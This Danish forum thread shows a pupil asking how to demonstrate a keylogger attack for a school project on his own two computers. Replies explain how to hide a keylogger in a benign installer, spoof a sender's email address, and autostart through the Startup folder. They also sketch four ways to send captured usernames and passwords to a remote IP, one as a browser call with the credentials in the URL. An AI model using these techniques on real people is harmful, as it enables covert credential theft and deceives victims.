hacking - it sikkerhed

Jeg vil umiddelbart mene at en keylogger er nemmere at forklare for folk der ingen erfaring har med programmering.

De fleste mennesker kan sætte sig ind i at der kan være et program på deres computer der aflytter deres tastetryk - hvorimod det kun er teknisk kyndige der vil vide hvad i alverden en SQL-injection går ud på - fordi man simpelthen ellers ikke ved hvordan SQL fungerer.

Derudover er der også større informationsværdi i at vise hvor simpelt det kan gøres med en keylogger. Det er jo relevant både for almindelige brugere og udviklere, at sikre sig mod en keylogger - hvor det kun er udviklere der skal sikre sig med injections.

Jeg er ret sikker på en keylogger vil gøre det nemmere for jer at lave en troværdig præsentation, og i forlængelse deraf at lave en god karakter. Derudover er en keylogger også et mere håndgribeligt "produkt" end en SQL-injection-sætning.

I princippet kunne I lave keyloggeren så den aflyttede på fx et hotmail-login, snarere end noget hjemmelavet, for at maksimere folks identifikation med truslen.

EDIT: Hvis I iøvrigt vil score nogle bonuspoints kan I når i snakker/skriver om baggrunden for "hacking" og "it-sikkerhed" komme ind på oprindelsen af ordet. Richard Stallman har skrevet en meget fornuftig anekdote på sin hjemmeside: http://www.stallman.org/articles/on-hacking.html

It is hard to write a simple definition of something as varied as hacking, but I think what these activities have in common is playfulness, cleverness, and exploration. Thus, hacking means exploring the limits of what is possible, in a spirit of playful cleverness. Activities that display playful cleverness have "hack value".

Hackers typically had little respect for the silly rules that administrators like to impose, so they looked for ways around.

Oprindeligt er en hacker nemlig ikke nødvendigvis en der bryder sikkerhedssystemer. Pressen og IT-sikkerheds-firmaer gennem tiden har dog fokuseret så meget på dette aspekt af at hacke (fordi det var det der solgte aviser/antivirus-software), at begrebet er muteret til at omhandle hovedsageligt IT-sikkerhed. Ifølge hackere af "den gamle skole" bør der skelnes mellem de venligtsindede hackere, og de fjendtlige crackere.

Bare lige en lille godbid

SQL injection lyder som en god ide, hvis folk forstår hvad web programmering og databaser er. Cross site scripting kunne også være en mulighed.

Det eneste problem er bare at det måske er lidt antiklimatisk at vise det til nogen der ikke helt ved hvad der foregår. Det kommer nok til at virke lidt fladt for både dem og jer.

Ved ikke om det er til nogen hjælp overhovedet, men tænk dog lige over det

Hvis du installerer en gammel udgave af windows med sikkerhedsfejl kan du udnytte det til at få keyloggeren ind. Men det er vel i virkeligheden ikke relevant (og det kræver også at man ved hvad man gør). Jeg ville hellere sende det med en email, evt. kan du fake fra-adressen så det ser ud som om mailen kommer fra en ven eller lignende.

Hej mange tak for de hurtige svar.
Synes også selv at en keylogger ville være det bedste at bruge MEN

Kan sagtens sætte en keylogger på min egen computer, problemet er at få den over på min 2. compyter VIA min 1. computer.

Det er det jeg ikke ved hvordan man gør..
har en forstilling om at men enten sender en keylogger hvis "ofret" så er dum nok til at downloade filen eller at man via computerens ip addresse ville kunne få adgang til at ligge en keylogger på computeren, som vidergav info til min computer.

husk at det begge er mine computere, så har ALT info det skal bare se ægte ud i handlings øjeblikket.

Kan nogle hjælpe - tak på forhånd.

Ja, tak men det jeg skal vide er hvordan jeg sender min keylogger og hvilken jeg skal bruge..
kender intet til den del.

Hvis man kunne bruge et remote program kunne det være det fedeste altså bare et der er let at detecte, som man connectede med via ip adrressen.

like Netbus

Jeg ville bundle keyloggeren i installeren til et tilsyneladende venligtsindet program, og så demonstrere hvor nemt man som bruger kan blive lokket til at downloade og installere det venligtsindede program, uden at vide at der også er en keylogger med.

sætter pris på din hjælp per!

Men hvilket program skal jeg bruge, og hvordan "bundler" jeg den til programmet. og hvilken keylogger eller hvordan laver jeg selv en?

Mail - Joakimheyklausen@hotmail.com

Shafh herindefra har skrevet en keylogger som han tilbyder gratis download af fra sin hjemmeside: http://www.shafh.dk/produkter/underside.php?id=1

Prøv at kigge på om ikke den kunne bruges til noget.

Hvordan man bundler? Det er bare et spørgsmål om at finde et program der kan lave en Install Wizard (led på google, der findes sikkert et hav) og så vælge både keyloggeren og det venligtsindede program som det der skal installeres.

Okay har downloadert shafts keylogger alt virker fint på min egen computer.

og har søgt lidt på google efter en Install wizard ( har fundet Install Wizard 3.0 )

Men hvordan får jeg keyloggeren til at sende informationerne til mig?

Hej Joakim

Umiddelbart ser jeg fire mulige løsninger, der ikke skulle være for besværlige...

1) Benytte en browser til at sende data via URL'en til en hjemmeside du har sat op på den ene comp.
Kunne f.eks. være: execute(path/to/firefox.exe "http://ip/?user=<aflæst brugernavn>&pass=<aflæst pass>"); (måske endda få IE til det - større chance for alle folk har den installeret hvis windows brugere)
Eller noget i den stil - har dog den ulempe at brugeren kan se browseren åbner op, men software/firewall vil nok næppe stoppe den i at blive eksekveret.

2) Benytte et bibliotek/library til HTTP, hvor du så via dens API kan gøre det samme som i 1, dog uden at en browser åbnes, så brugeren ikke ser at du videregiver data.
Men nye/uautoriserede programmer der evt. vil tilgå internettet kan blive stoppet af en firewall.

3) Sende oplysningerne over mail - kan også gøres ved at benytte et library til SMTP, i samme stil som 2.

4) Kode noget netværkskommunikation - er ikke så svært igen, hvis det bare er en simpel protokol der benyttes, såsom:
connect ( ip : port )
send ( user: <user> )
send ( pass: <pass> )
close_connection ( )
Hvis du benytter et nogenlunde højniveau sprog vil dette tage sig af alt benarbejdet.
Ville være rart hvis du oplyser hvilket sprog du koder i, så kan det være jeg (eller en anden) hurtigt kan finde noget simpelt netværkskode, du kan bruge.

Nu ved jeg ikke lige hvor meget information der er at finde på nettet, men jeg vil mene det er mere realistisk at sprede en keylogger over MSN, eller fra en hjemmeside der eksekverer noget kode lokalt - end i et venligsindet program's installer (men det er nok nemmere).
Hvis du spreder det via en installer og du gerne vil have programmet til at starte automatisk op, så er det nok nemmest at placere programmet i en start mappe, såsom: windows_menu->programmer->start (skulle gerne være der i XP, ved ikke lige med Vista eller Windows 7).
Dette har dog ulempen at det er nemt at se, men nu er det jo "kun" et 9. klasses projekt

Håber det her kan give dig lidt inspiration